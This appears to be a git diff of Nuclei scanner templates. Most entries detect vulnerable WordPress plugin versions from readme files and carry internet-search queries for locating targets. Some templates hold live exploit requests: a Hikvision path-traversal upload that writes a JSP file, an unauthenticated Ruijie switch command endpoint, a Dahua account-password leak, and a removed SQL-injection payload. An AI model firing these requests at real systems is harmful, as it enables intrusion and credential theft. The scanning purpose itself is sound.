-0,0 +1,59 @@ +id: special-feed-items-27adb5630206288cc4533169053590e1 + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml b/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml new file mode 100644 index 0000000000..a069e26609 --- /dev/null +++ b/poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml @@ -0,0 +1,59 @@ +id: visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f + +info: + name: > + Visual Sound (old) <= 1.06 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3595f1c7-22a5-46c6-b81f-fe616a71116f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + google-query: inurl:"/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.06') \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml @@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ b/poc/other/Ruijie_EXCU_SHELL.yaml @@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and diff --git a/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml b/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml new file mode 100644 index 0000000000..237d47551f --- /dev/null +++ b/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml @@ -0,0 +1,59 @@ +id: ai-engine-3bae955ccade96ed3bb2f0c913880abb + +info: + name: > + AI Engine <= 2.5.0 - Authenticated (Admin+) Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f6b761-9c4b-4dcc-885d-9a5b4e8e534d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ai-engine/" + google-query: inurl:"/wp-content/plugins/ai-engine/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ai-engine,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ai-engine/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ai-engine" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml b/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml new file mode 100644 index 0000000000..16798fecde --- /dev/null +++ b/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml @@ -0,0 +1,59 @@ +id: auxin-portfolio-937e73528345004677d696748421a9a3 + +info: + name: > + Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/auxin-portfolio/" + google-query: inurl:"/wp-content/plugins/auxin-portfolio/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,auxin-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml b/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml new file mode 100644 index 0000000000..693c1ab306 --- /dev/null +++ b/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml @@ -0,0 +1,59 @@ +id: beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6 + +info: + name: > + Beaver Builder (Lite Version) <= 2.8.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via type Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3.5') \ No newline at end of file diff --git a/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml b/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml new file mode 100644 index 0000000000..a65384de78 --- /dev/null +++ b/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml @@ -0,0 +1,59 @@ +id: booking-system-8649e5bc1fc86fb49801894149b7194d + +info: + name: > + Pinpoint Booking System <= 2.9.9.4.7 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3c897a-c3fb-4d1f-ad4c-c1bbb781a5aa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-system/" + google-query: inurl:"/wp-content/plugins/booking-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9.4.7') \ No newline at end of file diff --git a/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml b/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml new file mode 100644 index 0000000000..ef4ce828ee --- /dev/null +++ b/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml @@ -0,0 +1,59 @@ +id: chained-quiz-e57df0d2ff1d620125911e7a7435441f + +info: + name: > + Chained Quiz <= 1.3.2.8 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69bc3b17-87fd-4e69-b769-85bbf13b214e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/chained-quiz/" + google-query: inurl:"/wp-content/plugins/chained-quiz/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,chained-quiz,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "chained-quiz" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2.8') \ No newline at end of file diff --git a/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml b/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml new file mode 100644 index 0000000000..ecf93df2c8 --- /dev/null +++ b/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml @@ -0,0 +1,59 @@ +id: ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1 + +info: + name: > + Ditty 3.1.39 - 3.1.45 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80f32108-16a5-478f-9966-7153735cad6d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ditty-news-ticker/" + google-query: inurl:"/wp-content/plugins/ditty-news-ticker/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ditty-news-ticker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ditty-news-ticker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ditty-news-ticker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 3.1.39', '<= 3.1.45') \ No newline at end of file diff --git a/poc/other/dom-invaider.yaml b/poc/other/dom-invaider.yaml index b720bd8f88..4dc7a3f7be 100644 --- a/poc/other/dom-invaider.yaml +++ b/poc/other/dom-invaider.yaml @@ -1,28 +1,20 @@ id: dom-xss - info: - name: DOM Invader - Cross-Site Scripting + name: DOM XSS Sources & Sinks author: geeknik - severity: high - description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality. + severity: info reference: - Inspired by https://portswigger.net/blog/introducing-dom-invader - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 tags: xss,file file: - extensions: - js - ts - html - - htm - php - cs - rb - py - extractors: - type: regex name: sink @@ -42,7 +34,6 @@ file: - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' - 'iframe(\.srcdoc|\.src)' - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' - - type: regex name: source part: body @@ -50,5 +41,3 @@ file: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' - -# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml b/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml new file mode 100644 index 0000000000..3569f46c35 --- /dev/null +++ b/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml @@ -0,0 +1,59 @@ +id: front-end-only-users-90df2a922aebe8c48da99b7fe999c319 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml b/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml new file mode 100644 index 0000000000..3a964fd79f --- /dev/null +++ b/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml @@ -0,0 +1,59 @@ +id: funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab + +info: + name: > + Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/funnel-builder-pro/" + google-query: inurl:"/wp-content/plugins/funnel-builder-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,funnel-builder-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnel-builder-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.5') \ No newline at end of file diff --git a/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml b/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml new file mode 100644 index 0000000000..838105557d --- /dev/null +++ b/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml @@ -0,0 +1,59 @@ +id: give-5a41f38fc1abdcc291ed6c8ada86ceb0 + +info: + name: > + GiveWP <= 3.15.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a13ce09-b312-4186-b0e2-63065c47f15d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/give/" + google-query: inurl:"/wp-content/plugins/give/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,give,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/give/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "give" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.15.1') \ No newline at end of file diff --git a/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml b/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml new file mode 100644 index 0000000000..cf234474bf --- /dev/null +++ b/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml @@ -0,0 +1,59 @@ +id: infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293 + +info: + name: > + infolinks Ad Wrap <= 1.0.2 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee41498-f5c6-48c3-a0db-55a1fe6e7f92?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/infolinks-ad-wrap/" + google-query: inurl:"/wp-content/plugins/infolinks-ad-wrap/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,infolinks-ad-wrap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infolinks-ad-wrap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infolinks-ad-wrap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml b/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml new file mode 100644 index 0000000000..90b7f04eda --- /dev/null +++ b/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml @@ -0,0 +1,59 @@ +id: media-library-plus-305e1ca5563918c203ad44639d735fe6 + +info: + name: > + Media Library Folders <= 8.2.2 - Authenticated (Subscriber+) Second-Order SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/media-library-plus/" + google-query: inurl:"/wp-content/plugins/media-library-plus/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,media-library-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "media-library-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.2.2') \ No newline at end of file diff --git a/poc/other/mobile-security-framework.yaml b/poc/other/mobile-security-framework.yaml new file mode 100644 index 0000000000..39a342c547 --- /dev/null +++ b/poc/other/mobile-security-framework.yaml @@ -0,0 +1,20 @@ +id: mobile-security-framework +info: + name: mobile-security-framework + author: cn-kali-team + tags: detect,tech,mobile-security-framework + severity: info + metadata: + fofa-query: + - title="mobsf" + product: mobile-security-framework + vendor: mobsf_project + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: regex + regex: + - (?mi)]*>mobsf.*? diff --git a/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml b/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml new file mode 100644 index 0000000000..0b05978cee --- /dev/null +++ b/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml @@ -0,0 +1,59 @@ +id: mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file diff --git a/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml b/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml new file mode 100644 index 0000000000..0bd9b14b76 --- /dev/null +++ b/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml @@ -0,0 +1,59 @@ +id: premium-seo-pack-016f4f965dace571e947d960d2934b03 + +info: + name: > + Premium SEO Pack – WP SEO Plugin <= 1.6.001 - Unauthenticated Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-seo-pack/" + google-query: inurl:"/wp-content/plugins/premium-seo-pack/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-seo-pack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-seo-pack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 